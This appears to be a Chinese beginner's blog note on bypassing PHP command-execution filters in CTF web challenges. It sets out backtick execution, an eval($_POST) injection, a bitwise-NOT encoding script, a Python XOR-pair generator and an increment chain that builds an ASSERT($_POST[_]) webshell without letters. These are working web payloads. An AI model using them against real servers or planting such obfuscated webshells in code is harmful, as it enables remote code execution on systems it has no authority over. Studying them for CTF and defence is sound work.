首页 > 其他分享 >web入门-命令执行知识点

web入门-命令执行知识点

时间:2024-12-06 16:35:36浏览次数:2  
标签:知识点 入门 web echo 命令 valid ord tmp1 tmp2

禁用system时可以用别的命令
如:

echo`ls`;

反引号的作用是在执行时先执行它包裹的命令。
如果没有禁用eval
则可以用?c=eval($_POST[1]);
之后就可以进行命令执行
还可以用别的函数替代system
比如:passthru
还可以使用取反绕过:

<?php 
$a = urlencode(~'system');
$b = urlencode(~'dir');
echo $a;
echo '</br>';
echo $b;
echo '</br>';
echo ~urldecode('%8C%86%8C%8B%9A%92');
?>

还有异或绕过脚本:
py

valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "
​
answer = str(input("请输入进行异或构造的字符串:"))
​
tmp1, tmp2 = '', ''
for c in answer:
  for i in valid:
    for j in valid:
      if (ord(i) ^ ord(j) == ord(c)):
        tmp1 += i
        tmp2 += j
        break
    else:
      continue
    break
print("tmp1为:",tmp1)
print("tmp2为:",tmp2)

自增,别的文章里面提到过了,直接附上:

<?php
$_=[].'';   //得到"Array"
$___ = $_[$__];   //得到"A",$__没有定义,默认为False也即0,此时$___="A"
$__ = $___;   //$__="A"
$_ = $___;   //$_="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"S",此时$__="S"
$___ .= $__;   //$___="AS"
$___ .= $__;   //$___="ASS"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;   //得到"E",此时$__="E"
$___ .= $__;   //$___="ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++;   //得到"R",此时$__="R"
$___ .= $__;   //$___="ASSER"
$__++;$__++;   //得到"T",此时$__="T"
$___ .= $__;   //$___="ASSERT"
$__ = $_;   //$__="A"
$____ = "_";   //$____="_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"P",此时$__="P"
$____ .= $__;   //$____="_P"
$__ = $_;   //$__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到"O",此时$__="O"
$____ .= $__;   //$____="_PO"
$__++;$__++;$__++;$__++;   //得到"S",此时$__="S"
$____ .= $__;   //$____="_POS"
$__++;   //得到"T",此时$__="T"
$____ .= $__;   //$____="_POST"
$_ = $$____;   //$_=$_POST
$___($_[_]);   //ASSERT($POST[_])

临时文件(这个等我学会后在写)

标签:知识点,入门,web,echo,命令,valid,ord,tmp1,tmp2
From: https://www.cnblogs.com/govced/p/18591047

相关文章

  • 2024版最新渗透测试零基础入门教程,带你入门到精通(超详细),收藏这篇就够了
    一、渗透测试是什么?释义:我们理解的渗透测试是通过各种⼿段对⽬标进⾏⼀次渗透(攻击),通过渗透来测试⽬标的安全防护能⼒和安全防护意识。打个⽐⽅:⽐如电视剧《我是特种兵》⾥⾯的演习,特种部队(进攻⽅)渗透到蓝军(防守⽅)的指挥部进⾏斩⾸,如果斩⾸成功,那么就可以知道蓝⽅的防守能......
  • Metasploit木马生成教程,零基础入门到精通,收藏这篇就够了
    0****1概述上次我们聊到了通过目标系统漏洞来获取目标的权限,其实我们除了可以通过目标系统的漏洞来获取meterpreter之外,还可以直接通过木马获取。msfvenom就是MSF中用来生成后门木马的模块,在目标机器上执行后门木马,然后在本地配置监听目标即可上线,攻击机即可获得me......
  • 10个程序员可以接私活的平台(非常详细)零基础入门到精通,收藏这篇就够了_csd在哪里接单
    私活接的好收入不比上班少,一些同学靠接私活月收入也上万甚至几万了。今天老韩来分享一下有哪些接私活的网站和平台,转发收藏以后备用我们先来聊聊什么样的私活不能接。。1、没有第三方担保的个人对个人的尽量不要接,双方都没保障,出了问题很大的可能撕破脸皮不了了之。2、......
  • EasyCoding敏捷开发平台-入门指南
    【我的工作项】汇聚了与自己相关的工作,您可以在此快捷的处理待办事项。操作步骤1.登录EasyCoding控制台。2.选择“我的工作区>我的工作项”菜单。3.如果需要快速流转工作项状态,可以打开工作项编辑状态并保存。4.有干系人需要知晓,可以通过评论@干系人,系统会自动发送邮件。......
  • 人脸识别-入门操作
    本文介绍人脸识别产品快速入门的操作步骤。步骤一:鉴权及调用API以人脸检测为例,更多详情请查看认证鉴权。选择合适自己的开发工具,在这里用Python为例,点击Python3调用示例,选择复制全部代码;粘贴刚复制的代码块,接下来替换URL、AccessKey和SecurityKey、AppKey、入参类型;......
  • 内容寻址在 Web3 的应用
    内容寻址是一种通过数据内容生成唯一标识符(如哈希值)来定位和访问数据的方法,与传统的基于位置的寻址方式(如URL或文件路径)截然不同。在Web3的生态中,内容寻址得到了广泛应用,成为构建去中心化应用和分布式网络的重要技术基础。什么是内容寻址?内容寻址基于加密哈希算法(如SHA-25......
  • 第13天:Web应用&源码泄漏&开源闭源&指纹识别&GIT&SVN&DS&备份
    知识点:1、业务资产-应用类型分类2、web单域名获取-接口查询3、web子域名获取-解析枚举4、web架构资产-平台指纹识别1、开源-CMS指纹识别源码获取方式、2、闭源-习惯&配置&特性等获取方式3、闭源-托管资产平台资源搜索监控使用工具:潮汐指纹识别识别到cms然后去网上搜......
  • Python从入门到实践 练习7.5 电影票
            有家电影院根据观众的年龄收取不同的票价:不到3岁的观众免费,3(含)~12岁的观众收费10美元;年龄满12岁的观众收费15美元。请编写一个循环,在其中询问用户的年龄,并指出其票价。第一种做法:使用变量active来控制循环结束#设置一个活动标志active=True#关键区别#......
  • STM32:(入门)实现LED2灯循环闪烁
    思路:认识开发板的引脚——进行参数配置——运行代码——烧入开发板一、认识开发板的引脚(认识开发板)(STM32有2个LED灯的引脚分别是LED1-PA3,LED2-PB8【反面】) 依据题目,LED2灯---PB8二、进行参数配置(打开STM32CubeMx软件(新建项目)----选择版本【例题使用STM32F151C8】-......
  • 【Stable Diffusion系统教学】Ai绘画零基础入门到精通商业实战 人工智能绘图画图商业
    前言经过长时间的精心准备,我终于完成了这份StableDiffusion(以下简称SD)的使用教程!这份教程将带你从安装部署开始,逐步深入了解界面功能、实战案例制作。每一步都配有详细的指导,让你不仅能够理解,而且能够立刻动手实践。同时,无论是安装包,大模型,lora,关键词的文件都给大家打包......